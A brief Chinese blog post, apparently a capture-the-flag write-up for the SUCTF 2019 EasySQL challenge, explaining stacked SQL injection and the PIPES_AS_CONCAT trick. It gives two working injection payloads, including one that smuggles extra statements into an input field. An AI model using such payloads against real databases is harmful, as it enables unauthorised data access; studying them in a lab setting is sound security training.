Loading [MathJax]/extensions/TeX/extpfeil.js

[SUCTF 2019]EasySQL 1【BUUCFT】【SQL注入】

堆叠注入
set sql_mode=PIPES_AS_CONCAT;将||视为字符串的连接操作符而非或运算符
没有过滤*的时候可以直接注入

解法1

*,1

解法2

1;set sql_mode=PIPES_AS_CONCAT;select 1

解析思路参照 The Chen's repository

posted @ 2020-07-20 10:14 Borber 阅读(432) 评论(0) 收藏举报

刷新页面返回顶部

登录后才能查看或发表评论，立即登录或者逛逛博客园首页

【推荐】100%开源！大型工业跨平台软件C++源码提供，建模，组态！
【推荐】2025 HarmonyOS 鸿蒙创新赛正式启动，百万大奖等你挑战
【推荐】博客园的心动：当一群程序员决定开源共建一个真诚相亲平台
【推荐】开源 Linux 服务器运维管理面板 1Panel V2 版本正式发布
【推荐】轻量又高性能的 SSH 工具 IShell：AI 加持，快人一步

编辑推荐：
· 从 Redis 客户端超时到 .NET 线程池挑战
· C23和C++26的#embed嵌入资源指南
· 「EF Core」框架是如何识别实体类的属性和主键的
· 独立开发，这条路可行吗？
· 我在厂里搞 wine 的日子

阅读排行：
· 他没买 iPad，而是花了半年时间，为所有“穷学生”写了个笔记神器
· Visual Studio 现已支持新的、更简洁的解决方案文件（slnx）格式
· 只需一行命令，Win11秒变Linux开发主机！
· 也是出息了，业务代码里面也用上算法了。
· 从 Redis 客户端超时到 .NET 线程池挑战：饥饿、窃取与阻塞的全景解析

字节旗下的 AI IDE